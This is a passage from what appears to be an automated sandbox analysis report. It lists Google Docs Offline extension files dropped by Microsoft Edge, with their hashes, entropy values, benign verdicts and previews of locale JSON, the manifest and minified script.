                                                                                                                                                                                                                                                                                              SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                              MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                              SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                              SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                              SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1063
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                              MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                              SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                              SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                              SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1333
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                              MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                              SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                              SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                              SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1263
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                              MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                              SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                              SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                              SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1074
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                              MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                              SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                              SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                              SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):879
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                              MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                              SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                              SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                              SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1205
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                              MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                              SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                              SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                              SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):843
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                              MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                              SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                              SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                              SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):912
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                              MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                              SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                              SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                              SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):11280
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.751992630887702
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvUpGTcjG:m8IEI4u8Rp
                                                                                                                                                                                                                                                                                              MD5:250C48F4915DD4C0DFA7E7E021A4F066
                                                                                                                                                                                                                                                                                              SHA1:092A98BF40D8C18280393BF3811A7DFA9A9FD326
                                                                                                                                                                                                                                                                                              SHA-256:26D9B129339E2E2EB8E0223E16DB3CF0EA220AC0799480D462C236E6A425665E
                                                                                                                                                                                                                                                                                              SHA-512:8B18E232992E55E8DA97AC46D7AACA061508341D1EADCEFF1E9D0677734DFA8B892AB44754A3AA100585F5B2F2562BC4F2D7103065050FFCD00F91D5915CE5E6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):854
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                              MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                              SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                              SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                              SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2525
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.417833205646285
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1K9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APKgiVb
                                                                                                                                                                                                                                                                                              MD5:236D2DD305D64C2B6ABD232ED53270DF
                                                                                                                                                                                                                                                                                              SHA1:9F6885E95FBC4213631F0B0EA49C803D07D34136
                                                                                                                                                                                                                                                                                              SHA-256:2A4D526B9D1C8665427FB9E0DA58D16FDDE382DD74C1258941B18701EF7880C3
                                                                                                                                                                                                                                                                                              SHA-512:B76AF22153F79BCA2429A23746A62A430A521E952E7F94936648ECFD25AFDD9801ACBF6FD16941918A4FEDE39DE747AB6C6336BC86CA74384920AF7E815DB855
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):97
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                              MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                              SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                              SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                              SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3777)
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):98880
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.414989230634404
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
                                                                                                                                                                                                                                                                                              MD5:DC93A1045D1AD8D7ADD06B93B2FE79E2
                                                                                                                                                                                                                                                                                              SHA1:CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
                                                                                                                                                                                                                                                                                              SHA-256:D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
                                                                                                                                                                                                                                                                                              SHA-512:025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):291
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                              MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                              SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                              SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                              SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3782)
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):107677
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.396220758526552
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
                                                                                                                                                                                                                                                                                              MD5:E8015AC436B33034EDF7DA060E853A04
